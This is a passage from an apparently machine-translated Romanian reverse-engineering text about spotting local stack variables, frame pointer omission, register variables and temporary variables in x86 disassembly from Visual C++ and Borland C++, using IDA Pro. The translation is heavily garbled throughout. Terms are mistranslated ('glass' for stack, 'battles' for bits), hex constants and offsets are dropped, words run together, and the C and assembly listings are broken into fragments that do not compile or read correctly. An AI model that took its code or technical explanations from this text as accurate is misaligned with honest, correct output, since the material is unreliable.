operațiunea de inițializarefolosind MOOC, iar echipa de push este mai caracteristică pentru inserțiile de asamblare utilizate, de exemplu, înmecanisme de protecție pentru a confunda programele programelor Este adevărat, trebuie menționat că, chiar dacă o astfelde tehnică este confuză de hacker, este doar un începător Amplasarea tablourilor și structurilor masivului șistructurilor sunt plasate în stivă secvențial în celulele de memorie adiacente, în timp ce indicele mai mic alelementului tabloului (element structuri) se află la o adresă mai mică Vă rugăm să rețineți că, în același timp, un indice mai mic este adresatmodulului mare de deplasare în raport cu indicatorul cadrului stivei Acest lucru nu va părea surprinzător dacă amintimcă variabilele locale sunt adresate deplasărilor negative, prin urmare, [Hera- x ]> [Herar-Okhya] GPAVA Identificarea variabilelor locale de sticlă O confuzie este consolidată de faptul că, dând nume de variabile locale,Ida Rio scade un semn minus Prin urmare, din două nume, să zicem, ѵag și ѵag y, la o adresă mai mică se află aceavariabilă a cărei index este mai mare ”Dacă ѵag și ѵag y sunt două capete ale unui tablou, atunci din obișnuințăexistă o dorință involuntară de a pune ѵag în cap și ѵag în „coada” unui tablou, deși în realitate opusul esteopusul!Alinierea în stivă în unele cazuri elemente ale structurii, tabloului și chiar doar variabile individuale trebuiesă fie plasate în funcție de mai multe adrese Dar până la urmă, valoarea indicelui vertexului nu este definită în avans,iar compilatorul nu are informații despre acesta Cum poate el, neștiind valoarea reală a indicatorului, să poatăîndeplini această cerință?Da, foarte simplu - luați și aruncați bătăliile mai tinere ESP!Este ușor de dovedit, dacăbitul mai tânăr este zero, atunci numărul este egal Pentru a fi sigur că valoarea semnelor stivei este împărțită în douăfără urmă, este suficient să -și piardă bitul mai tânăr Renunțând la două bătălii, vom obține o valoare, evidentmultiplă de patru, trei - opt, etc Descărcarea de biți în marea majoritate a cazurilor este realizată de și ESP,FFFFFFFO Design, un multiplu de șaisprezece Cum a fost primită această valoare?Traducem OxfffffFO în formă binară,obținem - Vezi - patru zerouri la sfârșit?Acest lucru înseamnă că cele patru bătăliimai tinere ale oricărui număr vor fi mascate și vor fi împărțite fără urmă cu = Așa cum IDA Pro identificăvariabilele locale, deși cu variabile locale, ne -am îndeplinit în mod repetat atunci când studiem exemple trecute, vafi nu preveni acest lucru din nou Luați în considerare un exemplu dat în lista Listarea Demonstrațiavariabilelor locale #include #include intletc (int a, int b) {int s;// Tip variabil local Int CharX [ ] // Array (demonstrează schema de plasare // tablouri în memorie C = A+B; // Intrăm în 'c' Summers 'A și' `ь ' Itaa (S, & X [ ], x ); // Traducem suma „A” și „B” în linie Printf (" %x - = %s ==", C, & x [ ]); // Afișăm linialiniei pe ecran Return c, -} main () {int a = x ; // Declarăm variabilele locale „a” și „b” pentru a integramecanismul inițializării lor // compilator ints [ ]; // Aceste trucuri au fost necesare pentru asta pentru a interzice Partea a III -a Identificarea structurilor cheie ale limbilor de nivel înalt // Compiletorul deoptimizare este plasat local // variabil în registrul // Deoarece Funcțiile printf sunt transmise la „C”, iarindicatorul către registru nu poate fi trimis, // Compilatorul este obligat să părăsească variabila în memorie C [ ] =myfunk (a, b); printf ("%x \ \ \ \ \ p ", & s [ ]); return ;} Rezultatul compilării acestui exemplu folosindcompilatorul Visual Microsoft de la ++ cu setările implicite ar trebui să arate ca afișatÎn lista ;Listarea Rezultatul compilării exemplului din listarea folosind compilatorul Microsoft Visual C+* cu setărileimplicite MyFunk Proc Cod xref Main+LCXP VAR = BYTE PTR - H VAR = DWORD PTR - ;Variabilele locale sunt localizateîn funcție de ruda de deplasare negativă;Evv și argumentele funcției sunt pozitive Rețineți, de asemenea, că ce;„De maisus” este localizat, cu atât este mai mare modulul deplasării sale Arg = dword ptr arg - dword ptr och push ebpmov ebp, e sp;Deschide rama Stack Sub esp, h;Reduceți valoarea ESP cu x , rezervând x octeți pentrulocal;variabile MOV EAX, [EBP+arg ];Încărcăm valoarea argumentului Arg ;Faptul că acesta este un argument și nualtceva, vorbește pozitiv;Dispensare privind registrul de Evv Adăugați eax, [ebp+arg ];Îndoiți EAX cu valoareaargumentului arg MOV [EBP+VAR ], EAH;Și aici este prima variabilă locală ;Faptul că aceasta este tocmai variabilalocală indică negativul acesteia;Dispensare privind registrul de Evv De ce negativ?ȘI ;Vedeți cum a definit IDA„ѵAG ” ;Sincer, ar fi mult mai clar dacă este negativ;Deplasările variabilelor locale au fost accentuate mai clar PUSH H;Int Această problemă va fi discutată în detaliu în capitolul , „Identificarea registrului și a variabilelortemporare” GPAVA Identificarea variabilelor locale de sticlă ;Transmitem funcțiile valorii ITOA x (tipulsistemului de numere) Lea esh, [ebp+var ];Încărcăm indicatorul la variabila locală ѵAG ;Ce este această variabilă? Parcurgeți puțin ecranul Dizassembler;Conține o descriere a variabilelor locale recunoscute IDA ;var = byte ptr- h;Var - dword ptr - ;Cea mai apropiată variabilă inferioară are - deplasare și ѵAG ,;În consecință, - Scăzândde la primul ultim, obținem dimensiunea;ѵAG El, deoarece este ușor de calculat, va fi egal cu x ;Pe de altă parte,se știe că funcția ITOA se așteaptă la un indicator;Char* Astfel, în comentariul către ѵAG puteți înregistra;"Char s[ x ]" Acest lucru se face după cum urmează: în meniul „Editare” deschidem submeniul;„Funcții” și în el - elementul„Stack variabs” sau faceți clic pe „Hot”;Combinație + O fereastră se deschide cu o listă cu toaterecunoscute;variabile locale Aducem cursorul la „ѵag ” și facem clic pe pentru;Introducerea comentariului repetatși scrie ceva de genul „char s [ x ]” ;Acum faceți clic pe + pentru a completa intrarea și pentru;Închiderea ferestrei variabilelor locale Toata lumea!Acum aproape de toate apelurile la;ѵаг появлnminist PushEch;Char *;Transmitem funcțiile indicatorului ITOA către bufferul local ѵAG Mov edx, [ebp+var ];Încărcăm valoareavariabilei locale ѵAG în EDX Împingeți edx;Int ;Transmitem valoarea variabilei locale ѵAG ITOA funcții ;Pe bazaprototipului acestei funcții, IDA a determinat deja tipul;Variabilă - int Faceți clic pe + Din nou și comentațila ѵAG Sunați itoa adăugați esp, och;Traducem conținutul VAR într -un sistem de numere hexadecimale;înregistratsub formă de șir, returnând răspunsul;În tamponul local ѵAG Lea eah, [EBP+VAR ];Char s [ x ];Încărcăm indicatorulcătre bufferul local ѵAG din EAX PUSH EAH;Transmitem indicatorul către funcțiile ѵAG printf pentru ieșire;conținutpe ecran Mov ech, [ebp+var ];Copiați în ECH Valoarea variabilei locale ѵAG Push Ech;Trimiteți funcțiile printfValoarea variabilei locale ѵAG Push Offset Axs;" %x == %s ==" CALL PRINTF ADD ESP, OCH PARTEA III Identificareastructurilor cheie ale limbilor de nivel înalt MOV EAX, [EBP+VAR ];Revenim la EAX valoarea variabilei locale ѵAG MovEsp, EBP;Eliberăm memoria ocupată de variabile locale, pop EBP;Restabiliți sensul anterior al Evrei Retn myfunk endp minminim aproape;Cod xref: start+af | p var c = dword ptr -ch var = dword ptr - var = dword ptr - push ebp ebp ebp,esp;Deschide rama Stack Sub esp, och;Rezervăm o memorie de momeală OXC pentru variabile locale mov [ebp-^var ], h;Inițializează variabila locală ѵAG ;Alocarea acesteia valoarea OKHBBB MOV [EBP+VAR ], H;Inițializeazăvariabila locală ѵAG ;Alocarea ei o valoare de x ;A se vedea: Variabilele locale sunt localizate în memorie înordine inversă;Apelurile lor la ei!Non -anunț, și anume apelul ;De fapt, ordinea de locație nu se întâmplă întotdeaunaașa cum este asta;Depinde de compilator, deci bazându -se pe acesta nu merită niciodată MOV EAX, [EBP+VAR ];Copiațivaloarea variabilei locale ѵAG în registrul EAC PUSH EAH;Transmitem funcțiile valorii MyFunk a variabilei localeѵAG Mov ech, [ebp+var ];Copiați în ECH Valoarea variabilei locale ѵAG Push Ech;Trimiteți myfunk valoarea variabileilocale ѵag Sunați myfunk add esp, ;Sunați Myfunk MOV [EBP+VAR C], EAX GPAVA Identificarea variabilelor locale desticlă ;Copiați valoarea funcției în variabila locală ѵAG S Lea edx, [ebp+var c];Încărcămindicatorul la variabila locală ѵAG S în EDX Împingeți edx;Trimiteți funcțiile printf la variabila locală ѵag s PushOffset ASC ;"%x \ n" CALL PRINTF ADD ESP, XOR EAX, EAX;Return Zero Mov Esp, EBP;Eliberăm memoria ocupată devariabile locale Pop ebp;Închideți rama lui Stack Retn Main Endp nu este foarte dificil, nu?Ei bine, atunci vom lua înconsiderare rezultatul compilării aceluiași exemplu de compilatorul Borland C ++ - acesta va fi puțin mai dificil(lista ) • Listarea Rezultatul compilării exemplului din lista - folosind Borland C ++ MyFunk Proc înapropiere de compilator Cod xref: main+ ip var - byte ptr - h;Uite, - o singură variabilă locală!Dar am anunțatîntregul;Trei unde s -au dus?Acesta este un compilator viclean care le -a plasat;Registrele, nu se stive pentru mairepede la ei Push EBP MOV EBP, ESP;Deschide rama Stack Adăugați esp, offfffffcc;Ne rezervăm faceți clic pe înIDA, transformând numărul într-unul semnificativ ,;Rezervăm x octeți pentru variabile locale ;Obținem „- ” Vă rugămsă rețineți: de data aceasta lansarea memoriei;Nu este efectuat sub, dar adăugați 'push ebx;Păstrăm EVOS în stivă sauselectăm memoria cu o variabilă locală?;De când memoria a fost deja evidențiată Adăugați instrucțiuni, apoi în acest caz;Echipa de împingere salvează cu adevărat registrul în stivă LEA EBX, [EDX+EAX]A se vedea informații mai detaliate în capitolul „Înregistrarea de identificare și variabilele temporare” Partea III Identificarea structurilor cheie ale limbilor de nivel ridicat;Și cu această adăugarevicleană obținem cantitatea de EDX și EAX;Întrucât, EAX și EDX nu au fost inițializate clar, evident, prinele;Argumentele au fost transferate PUSH H;Transmitem funcțiile ITOA sistemul de numere selectat Lea eah,[EBP+VAR ];Încărcăm indicatorul către bufferul local ѵAG din EAX PUSH EAH;Transmitem funcțiile indicatorului ITOAcătre buffer pentru a înregistra rezultatul Împingeți EBX;Transferim suma (nu un indicator!) Din cele două argumente alefuncției MyFunk Apelați ltoa adăugați ESP, OCH LEA EDX, [EBP+VAR ];Încărcăm indicatorul către bufferul local ѵAG în EDX Împingeți edx;Transmitem funcțiile printf către bufferul local ѵAG ,;care conține rezultatul transformăriicantității argumentelor myFunc într -o linie Împingeți EBX;Transferim suma argumentelor funcției MyFunk Push OffsetAxs,- Format Call Printf Adăugare ESP, OCH MOV EAX, EBX;Returnăm cantitatea de argumente din EAX Pop ebx;Împingem EVO-urile de la Stack, restabilind sensul său anterior Mov Esp, EBP;Eliberăm memoria care este amuzată de variabilelelocale Pop ebp;Închideți rama lui Stack Retn myfunk endp;Intsdecl Main (int argc, Consta Char ** argv, const char *envp)jnain proc în apropiere Date xref Date: OO VAR = DWORD PTR - ;IDA a recunoscut cel puțin o variabilă locală-;Să luăm această notă Argc = DWORD PTR Această problemă a fost discutată în detaliu în capitolul , „Identificareaargumentelor funcțiilor” Capitolul Identificarea variabilelor locale de sticlă argv = DWORD PTR OCH ENVP = DWORDPTR LOH PUSE EBP MOV EBP, ESP;Deschide rama Stack Push Ecx Push EBX Push ESI;Salvăm registrele în stivă MOV ESI, H;Punem valoarea de x în registrul ESI Mov ebx, h;Punem valoarea de x în registrul EVKH Mov Edx, ESI MOVEAX, EBX;Transmitem funcțiile argumentelor MyFunk prin registre Sună Myfunk;Sunați Myfunk MOV [EBP+VAR ], EAX;Copiațirezultatul returnat de funcția MyFunk în local;Variabilă ѵAG Stop!Ce este o astfel de variabilă locală?!Și cine estesub;Amintirea ei despre ea?!Nu altfel - ca una dintre echipele de apăsare Dar ;care?Ne uităm la deplasarea variabilei -se află cu patru octeți mai mari;Evv și această zonă a memoriei este ocupată de conținutul registrului, păstrat;Primacomandă push după deschiderea cadrului stivei ;(În consecință, cea de -a doua echipă a echipei pune valoarea registruluiprin deplasare - ; etc ) Și prima a fost echipa Push Ech - prin urmare, aceasta nu este;conservarea registrului în stivăși rezervarea memoriei în local;variabil De când, apelează la variabila locală ѵAG și ѵAG S;Nu este observat, se parecă împingeți eush și împingeți comanda ESI;Păstrează într -adevăr registrele Lea esh, [ebp+var ];Încărcăm indicatorulla variabila locală ѵAG Push Ech;Transmitem indicatorul către ѵAG Funcții printf Push Offset ASC ;Format Call printf Add ESP, XOR EAX, EAX;Reveniți la EAX Zero Pop ESI Pop Ebx;Restaurați valorile registrelor ESI și EBX Pop Ecx Partea III Identificarea structurilor cheie ale limbilor de nivel ridicat;Eliberăm memoria alocată devariabila locală ѵAG Pop ebp;Închideți rama lui Stack Retn, Main Endp Exclusion of the Framing Pointer în modtradițional pentru abordarea variabilelor locale a folosit registrul HERARD Având în vedere că există doar șapteregistre de scop general, chiar nu vreau să le ofer unuia dintre ele o variabilă locală Nu puteți găsi nicio altăsoluție mai elegantă?În această secțiune, vom lua în considerare excluderea pointerului în cadru (Frame PointerOmission, FPO)-Abordare care vă permite să utilizați orice registru pe de biți ca index După ce ne -am gândit cuatenție, vom ajunge la concluzia că nu este nevoie de un registru separat pentru abordarea variabilelor locale deloc -suficient (nu fără trucuri, totuși) doar semne ESP ale stivei Singura problemă este rama plutitoare a stivei LET dupăalocarea memoriei pentru variabilele ESP locale indică partea de sus a regiunii alocate Apoi, variabila Buff (Fig )va fi localizată la ESP+OXC Dar merită să aducem ceva în stocarea de stocare temporară (argumentul funcției cauzate saua registrului), ca cadru „se târâie”, iar variabila Buff nu va fi localizată pe ESP+OXC, ci în conformitate cu ESP+ x !Compilatorii moderni sunt capabili să abordeze variabilele locale prin ESP, monitorizându -și dinamic valoarea (cutoate acestea, cu condiția să nu existe inserții de asamblare vicleană în corp, schimbând imprevizibil valoareaESP) Orez Adresarea variabilelor locale prin registrul ESP duce la Formarea cadrului plutitor al stivei GPAVA Identificarea variabilelor locale de sticlă face extrem de dificilăstudierea codului, deoarece acum este imposibil, prin pooperea unui deget într -un loc arbitrar al codului, pentru adetermina ce fel a variabilei locale este circulația - este necesară „pieptănarea” întregii funcții în întregime, urmândcu atenție valoarea ESP (și adesea căderea în erori brute care lasă drenajul toate lucrările) Din fericire, IDA ProDizassembler știe să se descurce cu astfel de variabile, dar hackerul diferă de un simplu muritor, care nu se bazeazăniciodată complet pe automatizare și se străduiește să înțeleagă cum funcționează!Luați în considerare un exemplu desimple c , care este cel mai simplu sistem de autentificare bazat pe o comparație spațioasă a parolei introduse cureferința (lista ) Listarea Cel mai simplu sistem de autentificare fondat de ^înaltă comparație '// cel maisimplu sistem de autentificare // Comparație apăsătoare a parolei #include #include #defineparolă size #define parolă "inygoodpassword \/ this // aceasta, atunci, pentru a lall // nu mușcați transferul de pelinie, // introdus de utilizatorul int main () // contorul încercărilor nereușite de a autentifica contul int = ;//Buffer pentru o parolă introdusă de utilizatorul Char Buff [Password Size];// Ciclul principal de autentificare pentru(;;) {// solicitați și citiți utilizatorul // parola printf ("Enter parola:");Fgets (& buff [ ], parola size, stdin);//Comparați parola originală și introdusă dacă (strcmp (fcBuff [ ], parolă)) // Dacă parolele nu se potrivesc, „jurați”printf („parolă greșită \ n”);// altfel (dacă parolele sunt identice) // Lăsăm ciclul de autentificare altul;// Creștemcontorul încercărilor nereușite // autentificare și, dacă toate încercările // epuizate -terminăm programul IF (++număr> ) return - ;// Odată ce suntem aici, utilizatorul a introdus parola de printf corectă ("parola k \ n");Unprogram similar, dar scris în C ++ Am investigat în capitolul , „cald -up” Partea III Identificarea structurilorcheie ale limbilor de nivel înalt Vom compila acest exemplu cu cheia / (optimizarea vitezei) Apoi, compilatorul se vastrădui să utilizeze toate registrele și să se adreseze variabilelor locale prin ESP, de care avem nevoie (lista ) Listarea Rezultatul compilării exemplului din listarea cu cheia / (optimizare G •> Cl Sarrple C / ;compilarea unui exemplu cu optimizare în viteză : EU Sub ESP, H; evidențiem Memorie pentru variabilelocale; acordați atenție - Acum - Acum nu există comenzi EBP \ Mov, ESP ' : AO MOV AL AL, [ ];Mov al, : Push EBX : Push Push Push EBP A: Push ESI V: Push Edis Susters C: MOV BYTE PTR [ESP+ H], AL Introducem valoarea zero în variabila locală [ESP+Oxlo] (Call It Buff) : B MOV ECX, H : cu XOR EAX EAX : D D LEA EDI, [ESP+LLH] InstalațiEDI pe o variabilă locală [ESP+ xll] (buff de coadă non -property) V: PUSH H; "ENParola ter";Aducem linii de parolă Enter într -un pahar Atenție ESP Register se târâie acum pe octeți „UP” : F AB REPSTOS DWORD PTR [EDI] : AB STOS WORD PTR [EDI] : ED XOR EBP, EBP : AA STOS BYTE PTR[EDI];Număr Bufferul : E F Apel ;Linia „Introduceți parola” pe ecran ;Atenţie!Argumenteleîncă nu sunt;Apăsată din stivă! C: PUSH H;Intrăm deplasarea pointerului în indicatorulstdin ;Atenţie!ESP încă se târâie cu patru octeți : d c Lea Ech, [ESP+ H];Încărcăm indicele lavariabila [ESP+ xl ] Un alt tampon?Nu!;Aceasta este deja o variabilă familiară pentru noi [esp+ xl ], dar „înlocuireaaspectului” pe cheltuieli;Schimbări ESP Dacă scădeți octeți de la x la care ne -am târât esp - primim x ,-;Adică, vechea noastră familiară - [ESP+ xl ] I Lininy Procedure of a zeci de linii „interioare” nu este dificilă, darîn program într -un milion de linii puteți petrece timp fără scop și nu obțineți niciun rezultat!În acest CPAVA IdaRio va fi mult mai bun pentru a face față mult mai bine Rezultatul dizassambling al exemplului analizat este dat înlista ■ Listarea ”Rezultatul DizAssempling of Cod optimizat din exemplul: dat în lista folosind IDA RGO Text: Text: Text: Text: PROC PRIN;Cod xref: start+af; p var = byte ptr - h var = byte ptr - h ida a găsit două variabilelocale localizate în raport cu stiva de deplasare și , motiv pentru care: ѵAG și ѵAG text: text: text: text: text: a text: b text: c sub esp, h mov al,byte push eb ], Al;IDA stabilește automat numele variabilei locale la deplasarea acesteia în;Frame Steki Text: Text: Text: MOV ECX, H XOR AX, EAX LEA EDI, [ESP+ H+VAR ];Desigur, IDA nu a pututrecunoaște inițializarea primului octet al tamponului și;L -a luat greșit pentru o variabilă separată - dar aceasta nueste vina ei, dar;Compilator!Aflați câte variabile pot de fapt;Doar o persoană "Introduceți parola: ' Repe Stosd StoswXor EBP, EBP STOSB Apelați Sub Pushh Offset OFF LEA ECX, [ESP+ CH+VAR ]; Vă rugăm să recunoaștețicorect apelul la variabila noastră, Deși deplasarea acesteia se distinge - cel puțin deplasarea acesteia - distins -cel puțin x c x ! Capitolul Identificarea registrului și a variabilelor temporare care încearcă să minimizezenumărul de apeluri de memorie, optimizând compilatoarele plasează cele mai utilizate variabile locale în registregenerale, numai dacă este necesar, păstrarea lor în stivă (și în în cadrul unei stive Caz ideal - fără a le păstradeloc) Care sunt dificultățile Pentru analiză, acest lucru creează acest lucru? În primul rând, optimizarea introducedependența contextuală în cod Deci, văzând o echipă ca Moch EAH în orice punct de funcție, [Heb+ ѵag ], putem spunecu încredere că conținutul variabilului OG YU este copiat în registrul EAC Și ce fel de variabilă este aceasta? Acestlucru poate fi recunoscut cu ușurință trecând prin corpul unei funcții pentru a căuta toate intrările ѵag -ei sunt despusMisiunea este groaznică!Cu variabile de înregistrare, această abordare nu va funcționa!Să presupunem că amîndeplinit instrucțiunile lui Moch EAH, ESI și vrem să urmărim toate apelurile la variabila de înregistrare ESI Cetrebuie să faceți, deoarece căutarea reglării ESI în corp nu va da nimic, cu excepția multor lucrări false La urmaurmei, același registru (în cazul nostru ESI) poate fi utilizat (și utilizat) pentru depozitarea temporară a multorvariabile diferite!Întrucât există doar șapte registre cu scopuri generale și, de asemenea, Evv este „atribuit” înspatele indicatorului cadrului de scăpare, iar EAX și EDX - doar patru regiuni adecvate pentru stocarea variabilelorlocale rămân în spatele funcției returnate Și în programele C ++ vor exista și mai puțin registre disponibile - unuldintre cele patru registre merge la indicatorul către tabelul virtual, iar celălalt - la indicatorul la acestcaz Lucruri rele!Nu veți accelera în mod special cu două registre, deoarece funcția tipică conține zeci de variabilelocale!Iată compilatorul și folosește registrele ca cache - numai în cazuri excepționale, fiecare variabilă locală seaflă în registrul „ei”, cel mai adesea variabilele sunt împrăștiate aleatoriu în funcție de registre, uneori rămân înstivă, adesea împingând într -un complet diferit Înregistrați -vă (nu în faptul căruia a fost păstrat conținut) Aproapetoate DizAssemblers -urile comune (inclusiv IDA Pro) nu sunt capabile să urmărească „migrația” variabilelor deînregistrare, iar această operație trebuie să fie efectuată manual Este destul de simplu să determinați conținutulregistrului într -un punct arbitrar al programului, deși obositor, este suficient să conduceți programul de la începutulfuncției până la acest moment, urmărind toate operațiunile de tranzit Este mult mai dificil să afli câte variabilelocale sunt stocate în acest registru Când un număr mare de variabile sunt afișate la un număr mic de registre, devineimposibil să restabiliți complet afișajul Aici, de exemplu: programatorul anunță o variabilă A, - Compilatorul îlplasează în registrul x După ceva timp, programatorul declară o variabilă - și dacă variabila nu mai este utilizată(ceea ce se întâmplă destul de des), compilatorul poate plasa variabila în același registru, fără a avea grijă demenținerea valorii a În urma acestui fapt, o variabilă este „pierdută” La prima vedere, nu există probleme aici Pierdem- bine, bine!Teoretic, programatorul însuși ar putea face acest lucru - Întrebarea este: de ce a introdus B, când pentrumuncă este suficient pentru unul?Dacă variabilele A și B au un singur tip, atunci nu apar probleme cu adevărat, altfelanaliza programului va fi extrem de dificilă GPAV Identificarea registrului și a variabilelor temporare Variabile de înregistrare pe care le vom traversa La tehnica identificării variabilelor de registru Multe ghiduri de hacker susțin că variabila de registru diferă derestul prin faptul că nu se transformă niciodată în memorie Acest lucru este incorect, deoarece variabilele deînregistrare pot persista temporar în stivă prin comanda push și recupera înapoi de către echipa ROR Desigur, formal, oastfel de variabilă încetează să mai înregistreze, dar, în același timp, nu devine nici un pahar Pentru a nu zdrobitipurile de variabile în multe clase, suntem de acord să credem că, conform altor orientări ale hackerului, variabila deregistru este variabila conținută în Registrul de scop general, eventual păstrat în stivă, dar întotdeauna în vârf, Șinu în cadrul stivei Cu alte cuvinte, variabilele de înregistrare nu sunt niciodată abordate prin intermediul HEB Dacăvariabila este adresată prin Heb, prin urmare, aceasta este „înregistrată” în cadrul stivei și este o variabilă astivei Dreapta?Nu!Vedeți ce se va întâmpla dacă variabila de înregistrare este acordată valoarea variabilei de sticlăb Compilatorul generează aproximativ următorul cod: Mo Reg, [EBP-XXX] În consecință, însușirea unei valori variabile destivă a registrului va arăta astfel: Moi [Hera-XXX], Reg Dar, în ciuda apelului evident la cadrul stivei, variabila Regrămâne o variabilă de înregistrare Luați în considerare codul dat în lista Listarea Un exemplu care ilustreazădiferențele dintre registru și Burbot Moos [HEB- x ], x MOV ESI, [EBP- X ] MOV [EBP- x ], ESI MOV ESI, x subESI, [EBP- x ] MOV [EBP-OXC ], ESI Un exemplu dat în lista poate fi interpretat în două moduri Dacă există într-adevăr o anumită variabilă înregistrată ESI, atunci textul original al exemplului ar trebui să arate așa cum se aratăîn lista (a) Cu toate acestea, situația este, de asemenea, destul de posibilă atunci când registrul ESI esteutilizat ca variabilă temporară pentru trimiterea de date, iar apoi textul original al exemplului ar trebui să arate așacum se arată în lista (b) Listarea Opțiuni pentru restabilirea codului sursă al fragmentului programului dat// a) Registrul ESI este utilizat ca // Variabila de înregistrare int ѵag = x ;int var = var ;// b) RegistrulESI este utilizat ca // variabilă temporară int ѵag = x ;Înregistrare int eSI = var ; În limbile C/C ++,registrul de cuvinte cheie, conceput pentru a compara variabilele din registre și totul ar fi bine, dar marea majoritatea compilatorilor ignoră liniștit instrucțiunile programatorilor, plasând variabile unde, potrivit compilatorului,acestea, acestea va fi „convenabil” Dezvoltatorii compilatorilor explică acest lucru prin faptul că compilatorul „știe”mai bine „cum să construiască cel mai eficient cod Ei spun, nu este necesar să încercați să ajutațicompilatorul Următoarea analogie sugerează în sine: pasagerul spune - trebuie să fac la aeroport, iar șoferul de taximerge fără obiecții „mult mai convenabil” Ei bine, munca cu compilatorul nu ar trebui să se transforme într -un războicu el, nu există nicio modalitate de a refuza să plasați o variabilă în registru este destul de legală Cu toate acestea,în acest caz, compilatorul ar trebui să înceteze să se comppteze cu emiterea unui anunț de eroare care să ordone săelimine registrul sau, cel puțin, să retragă un avertisment Partea a III -a Identificareastructurilor cheie ale limbilor de nivel înalt int var c = x - var i int var = eSI;ESI = x -VAR ;în var c =ESI, deși algoritmii ambelor listări sunt absolut identici, opțiunea (a) câștigă vizibil în claritate Trebuieamintit că principalul obiectiv al DizAssMitting nu este în niciun caz să reproducă textul inițial autentic alprogramului, ci reconstrucția algoritmului său Este complet indiferent de ceea ce este ESI - Registrul sau variabilatemporară Principalul lucru este restaurarea algoritmului de lucru Aceasta înseamnă că din mai multe opțiuni deinterpretare ar trebui să alegeți cel mai vizual!Așadar, am abordat conceptul de variabile temporare, dar înainte de a-l studia îndeaproape, vom finaliza studiul variabilelor de înregistrare prin studiul exemplului dat în lista Listarea Un exemplu care demonstrează identificarea variabilelor de înregistrare * main () (int a = x ; intb = x ; int s; c = a + b; printf (" %x + %x = %x \ n", a, b , c, c, c ); c = b-a; printf (" %x- %x = %x \ n", a, b,c);} rezultatul compilării acestui exemplu folosind Borland C ++ Compilatorul x ar trebui să privească aproximativ așacum se arată în lista = Lista Rezultatul compilării exemplului dat în lista L folosind Borland C ++ X;Intecl Main (int argc, Consta char ** Argv, const char *envp) jnain proc apropiat; date xref: date: -lo argc =dword ptr argv = dword ptr och envp = dword ptr loh; acordați atenție-ida nu a recunoscut o singură stivă variabilă,deși au fost anunțat în program ; Există în registre Push EBP MOV EBP, ESP;Deschide rama Stack Push EBX PUSH ESI;Salvăm registrele din stivă sau selectămmemoria pentru sticlă;Variabile?Din moment ce Ida nu a găsit un singur pahar;Variabila este cel mai probabil că acestcod economisește registrele Mov ebx, h;Vezi: inițializează registrul!Comparați acest lucru cu lista , GPAVA Identificarea registrului și a variabilelor temporare ;Dat în capitolul , „Identificarea sticlei locale;variabile” Amintiți -vă, a fost: MOV [EBP+VAR ], H ;Prin urmare, putem bănui că ESH este unregistru;variabil Existența variabilei este dovedită prin faptul că dacă;Valoarea x ar fi transmisă directfuncțiilor adică, deci -;Printf (" %x %x %x \ p", x ), compilatorul ar fi plasat în cod;Instrucțiuni „Push x ” Șiîntrucât nu este cazul, prin urmare, sensul; x a fost transmis prin variabilă ;Reconstruirea testului original pecare îl scriem :; int a = x Mov ESI, H;În mod similar, ESI este cel mai probabil înregistrat;variabil; Ints = x Lea EAH, [ESI+EBX];Încărcăm cantitatea de ESI și EAS în EAX;Nu, EAH nu este un indicator, ci doar un plus atât deviclean PUSH EAH;Transferăm funcțiile printf suma variabilelor de înregistrare ESI și EASH;Dar ceea ce EAX este - dejainteresant Poate fi reprezentat și;variabilă independentă și transfer direct al sumei;Variabilele A și B Funcțieprintf Bazat pe considerente;locuibilitate, selectați ultima opțiune; printf (,,,, a+b) împinge ESI;Transmitemfuncțiile printf ale variabilei de registru ESI, mai devreme;desemnat de noi ca ”; printf (,,, b, a+b) împingeebx;Transmitem funcțiile printf către registrul EVCHE, mai devreme;desemnat ca „A”; printf (, a, b, a+b) Push OfficeAHHH;" %x + %x = %x";Transmitem funcțiile printf indicatorul către linia specificatorilor, judecând după;care toate celetrei variabile au tipul de int; printf (" %x + %x = %x", a, b, a + b) apelați printf add esp, loh mov eAx,esi;Copiați în EAX Valoarea variabilei de înregistrare indicate ESI;USB'; int s = b sub eah, ebx;Scădem din variabilade registru EAX ('C');Valoarea eugenei variabile („A”) este Partea III Identificarea structurilor cheie ale limbilorde nivel ridicat; c = s-a push eah;Transmitem funcțiile printf diferența dintre valorile variabilelor EAX șiUE;Da!Vedem că putem refuza o variabilă „C”;n Transmiterea directă a funcțiilor printf, diferența de valori „b”și;'A' Traversăm linia „ ”(Faceți un rollback) ,;Și în loc de ' „Scriem următoarele :; printf (,,,,, b-a) împingeESI;Transmitem valoarea funcțiilor printf a variabilei de înregistrare ESI (”); Printff a) PUSH EBX;Transmitemfuncțiile printf valoarea variabilei de înregistrare EUSH ('A'); printf (, a, b, b-a) push offse ahhh ;" %x + %x =%x";Transmitem funcțiile printf indicatorul către linia specificatorilor, judecând după;care toate cele trei argumenteau tipul int; printf (" %x + %x = %x", a, b, b-a) Call printf add esp, loh xor eAx, eAx; reveniți la EAX Zero ;Revenire despre pop esi pop ebx; restaurări registre; restaurări registre ; pop ebp; închideți cadrul Stekhi Retn; caurmare, textul reconstruit arată astfel :; int a = okbbb; int b = x ; printf (" %x + %x = % % x ", și, a, a,a, a, a, a, a, a, a, a, a, a b, a + b); printf (" %x + %x = %x " , a, b, b - a); compararea rezultatului dvs cutextul sursă original, c; găsim o oarecare supărare că este încă ușor am făcut o greșeală; Distrugeți -l pe al nostru;lucrarea, dimpotrivă, a oferit listei un aspect mai „pieptănat”; facilitând percepția acesteia Cu toate acestea, nu secertă despre gusturi și dacă doriți să urmați codul de asamblare, urmați bine, voința voastră - ; introduceți ovariabilă „C” Această decizie, apropo, are acel plus că nu trebuie să faceți un „rollback” - rescrieți deja; liniireconstruite pentru a le elimina variabila inutilă Main Endp IdentificăII de înregistrare și variabile temporare Variabile temporare ale variabilelor temporare, vom numi variabile locale introduse în codulprogramului de către compilator în sine Pentru ce sunt necesare?Luați în considerare următorul exemplu: int b = a Dacă Ași B sunt variabile de stivă, atunci atribuirea directă este imposibilă, deoarece adresarea „memoriei - memoriei”lipsește în microprocesoarele seriei x Așadar, trebuie să efectuați această operație în două etape: "Memory ->Register" + "Register -" Memory " De fapt, compilatorul generează codul prezentat în lista Listarea Codulgenerat de compilator atunci când lucrează cu Variabilele temporare înregistrează int = a;MOV EAX, [EBP+VAR ] INT B =TNIP, MOV [EBP+VAR ], EAX în listarea TMP - Aceasta este o variabilă temporară creată numai în timpul funcționăriifuncționării B = A, și apoi distrusă ca inutilă Compilatoare (în special optimizarea) Ei se străduiesc întotdeauna să plaseze variabile temporare în registre și numai în cazuri extreme le aduc înstivă Mecanismele de izolare a memoriei și metodele de citire/înregistrare ale variabilelor temporare sunt destul dediverse Conservarea variabilelor în stivă este reacția obișnuită a compilatorului la o deficiență acută de registrevariabile întregi sunt 